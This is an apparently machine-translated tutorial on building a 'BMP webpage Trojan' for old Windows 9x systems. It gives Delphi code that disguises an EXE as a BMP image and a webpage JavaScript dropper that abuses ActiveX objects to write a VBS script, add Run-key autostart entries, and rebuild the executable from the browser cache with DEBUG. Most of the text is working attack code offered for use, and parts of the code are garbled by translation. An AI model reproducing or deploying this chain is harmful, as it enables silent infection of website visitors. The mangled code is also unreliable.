Principle Analysis of image Trojan (old technology)

What is BMP webpage Trojan? It is different from a trojan that used to have a smelly MIME Header Vulnerability. The MIME trojan uses MIME to encode an EXE file into an EML (out look mail) file, put it on the webpage and use the IE and OE encoding vulnerabilities for automatic download and execution.
However, BMP Trojans are different. They disguise an EXE file as a BMP image file, cheat IE to automatically download it, and then use JAVASCRIPT scripts on the webpage to find the Temporary Internet folder of the client, find the downloaded BMP file and copy it to the TEMP directory. Write a script to restore the BMP file to EXE with DEBUG, and put it in the Registry Startup item, and execute it at the next boot. however, this technology can only play a role under 9X, And it is powerless for 2 K and XP.
It seems complicated. Let's take a step:
1) how to change EXE to BMP
You can check the BMP file information by yourself. The file header of the BMP file contains 54 bytes. In short, it contains the length, width, number of digits, file size, and data zone length of the BMP file. We only need to add the corresponding BMP file header before the file header of the EXE file (of course, the data in the BMP file header must meet the size of the EXE file), so that we can cheat IE to download the BMP file, we started to experiment with JPG files and found that if the file header is incorrect, it will not be downloaded. The conversion code is as follows:
Program exe2bmp;

Uses
Windows,
SysUtils;

Var len, row, col, fs: DWORD;
Buffer: array [0 .. 255] of char;
Fd: WIN32_FIND_DATA;
H, hw: THandle;

Begin
If (ParamStr (1) <> '') and (ParamStr (2) <>'') then begin // exit if there are no two parameters after running
If FileExists (ParamStr (1) then begin
FindFirstFile (Pchar (ParamStr (1), fd );
Fs: = fd. nFileSizeLow;
Col: = 4;
While true do begin
If (fs mod 12) = 0 then begin
Len: = fs;
End else len: = fs + 12-(fs mod 12 );
Row: = len div col div 3;
If row> col then begin
Col: = col + 4;
End else Break;
End;
FillChar (buffer, 256, 0 );
{BMP file header data}
Buffer [0]: = 'B'; Buffer [1]: = 'M ';
PDWORD (@ buffer [18]) ^: = col;
PDWORD (@ buffer [22]) ^: = row;
PDWORD (@ buffer [34]) ^: = len;
PDWORD (@ buffer [2]) ^: = len + 54;
PDWORD (@ buffer [10]) ^: = 54;
PDWORD (@ buffer [14]) ^: = 40;
PWORD (@ buffer [26]) ^: = 1;
PWORD (@ buffer [28]) ^: = 24;
{Write File}
Hw: = CreateFile (Pchar (ParamStr (2), GENERIC_WRITE, file_1__read or
File_cmd_write, nil, CREATE_ALWAYS );
H: = CreateFile (Pchar (ParamStr (1), GENERIC_READ, file_1__read or
File_into_write, nil, OPEN_EXISTING );
WriteFile (hw, buffer, 54, col, 0 );
Repeat
ReadFile (h, buffer, 256, col, 0 );
WriteFile (hw, buffer, col, col, 0 );
Untilcol<> 256;
WriteFile (hw, buffer, len-fs, col, 0 );
CloseHandle (h );
CloseHandle (hw );
End;
End;
End.

The above code can be compiled in DELPHI4, 5, and 6 to get an exe2bmp .exe file. You can open the MSDOS mode and enter
Exe2bmp myexe.exe mybmp
Press enter to convert the EXE file specified by the second parameter to the BMP format.
The next step is to put this BMP image on the webpage. If you open this image, you will surely find that this BMP image is colorful and monotonous. Therefore, it is best to use this format when you put it on the webpage.

The following is the script on the web page.
Document. write ('');
Function docsave ()
{
A = document. applets [0];
A. setCLSID ('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B }');
A. createInstance ();
Wsh = a. GetObject ();
A. setCLSID ('{0D43FE01-F093-11CF-8940-00A0C9054228 }');
A. createInstance ();
Fso = a. GetObject ();
Var winsys = fso. GetSpecialFolder (1 );
Var vbs = winsys + '\ s. vbs ';
Wsh. RegWrite
('Hkcu \ Software \ Microsoft \ Windows \ CurrentVersion
\ Run \ vbs ', 'wscript' +' "'+ vbs + '"');
Var st = fso. CreateTextFile (vbs, true );
St. WriteLine ('option Explicit ');
St. WriteLine ('dim FSO, WSH, CACHE, str ');
St. WriteLine ('set FSO = CreateObject ("Scripting. FileSystemObject ")');
St. WriteLine ('set WSH = CreateObject ("WScript. Shell ")');
St. WriteLine ('cache = wsh. RegRead ("HKCU \ Software \ Microsoft
\ Windows \ CurrentVersion \ Explorer \ ShellFolders \ Cache ")');
St. WriteLine ('wsh. RegDelete ("HKCU \ Software \ Microsoft \ Windows
\ CurrentVersion \ Run \ vbs ")');
St. WriteLine ('wsh. RegWrite "HKCU \ Software \ Microsoft \ Windows
\ CurrentVersion \ Run \ tmp "," tmp.exe "');
St. WriteLine ('searchbmp file fso. GetFolder (CACHE), "mybmp pai1).bmp "');
St. WriteLine ('wscript. Quit ()');
St. WriteLine ('function searchbmp file (Folder, fname )');
St. WriteLine ('dim SubFolder, File, Lt, tmp, winsys ');
St. WriteLine ('str = FSO. GetParentFolderName (folder )&
"\" & Folder. name & "\" & fname ');
St. WriteLine ('If FSO. FileExists (str) then ');
St. writeline ('tmp = FSO. getspecialfolder (2 )&"\\"');
St. writeline ('winsys = FSO. getspecialfolder (1 )&"\\"');
St. writeline ('set file = FSO. GetFile (STR )');
St. writeline ('file. Copy (TMP & "tmp. dat ")');
St. writeline ('file. delete ');
St. writeline ('set lT = FSO. createtextfile (TMP & "tmp. In ")');
St. writeline ('Lt. writeline ("RBx ")');
St. writeline ('Lt. writeline ("0 ")');
St. writeline ('Lt. writeline ("rcX ")');
St. writeline (& lt. writeline ("1000 ")');
St. writeline ('Lt. writeline ("w136 ")');
St. writeline ('Lt. writeline ("Q ")');
St. writeline ('Lt. close ');
St. writeline ('wsh. Run "command/C debug" & TMP & "tmp. dat
<"& TMP &" tmp. In> "& TMP &" tmp. Out ", false, 6 ');
St. WriteLine ('on Error Resume next ');
St. WriteLine ('fso. GetFile (tmp & "tmp. dat"). Copy (winsys & "tmp.exe ")');
St. WriteLine ('fso. GetFile (tmp & "tmp. dat"). delete ');
St. WriteLine ('fso. GetFile (tmp & "tmp. in"). delete ');
St. WriteLine ('fso. GetFile (tmp & "tmp. out"). delete ');
St. WriteLine ('end if ');
St. WriteLine ('If Folder. SubFolders. Count <> 0 then ');
St. WriteLine ('For Each SubFolder In Folder. SubFolders ');
St. WriteLine ('searchbmp file SubFolder, fname ');
St. WriteLine ('Next ');
St. WriteLine ('end if ');
St. WriteLine ('end function ');
St. Close ();
}
SetTimeout ('docsave () ', 1000 );
Save the script as "js. js" and insert it into the webpage:
<Script src = "js. js"> </script>
This script will generate a "S. vbs" file in the system directory of the local machine, which will automatically run at the next boot. The main purpose is to find the mybmp transfer 12.16.bmp file from the overview directory.
The main content of the "S. vbs" file is as follows:
Option explicit
Dim FSO, wsh, cache, STR
Set FSO = Createobject ("scripting. FileSystemObject ")
Set wsh = Createobject ("wscript. Shell ")
Cache = wsh. regread ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion
\ Explorer \ shellfolders \ cache ")
Wsh. regdelete ("hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ vbs ")
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ tmp", "tmp.exe"
Searchbmp file FSO. getfolder (cache), "mybmp 201712.16.bmp"
Wscript. Quit ()
Function searchbmp file (folder, fname)
Dim subfolder, file, LT, TMP, winsys
'Find the target BMP image from the Temporary Folder
STR = FSO. getparentfoldername (folder) & "\" & folder. Name & "\" & fname
If FSO. FileExists (str) then
Tmp = fso. GetSpecialFolder (2 )&"\"
Winsys = fso. GetSpecialFolder (1 )&"\"
Set File = FSO. GetFile (str)
File. Copy (tmp & "tmp. dat ")
File. Delete
'Generate a DEBUG script
Set Lt = FSO. CreateTextFile (tmp & "tmp. in ")
Lt. WriteLine ("rbx ")
Lt. WriteLine ("0 ")
Lt. WriteLine ("rcx ")
'The second row in the following row is in hexadecimal format, and the decimal format is 1000 (This number is the size of your EXE file)
Lt. WriteLine ("1000 ")
Lt. WriteLine ("w136 ")
Lt. WriteLine ("q ")
Lt. Close
WSH. Run "command/c debug" & tmp & "tmp. dat <" & tmp & "tmp. in>" & tmp & "tmp. out", false, 6
On Error Resume Next
FSO. GetFile (tmp & "tmp. dat"). Copy (winsys & "tmp.exe ")
FSO. GetFile (TMP & "tmp. dat"). Delete
FSO. GetFile (TMP & "tmp. In"). Delete
FSO. GetFile (TMP & "tmp. Out"). Delete
End if
If folder. subfolders. Count <> 0 then
For each subfolder in folder. subfolders
Searchbmp file subfolder, fname
Next
End if
End Function
This script will find the BMP file in the Temporary Folder and generate a debug script. The runtime will automatically read the data of the specified size from the 54 bytes of the BMP file, and save it to TMP. dat. the subsequent script copies it to the system directory. the restored EXE file will be run at the next restart. this is the basic implementation process of BMP Trojans.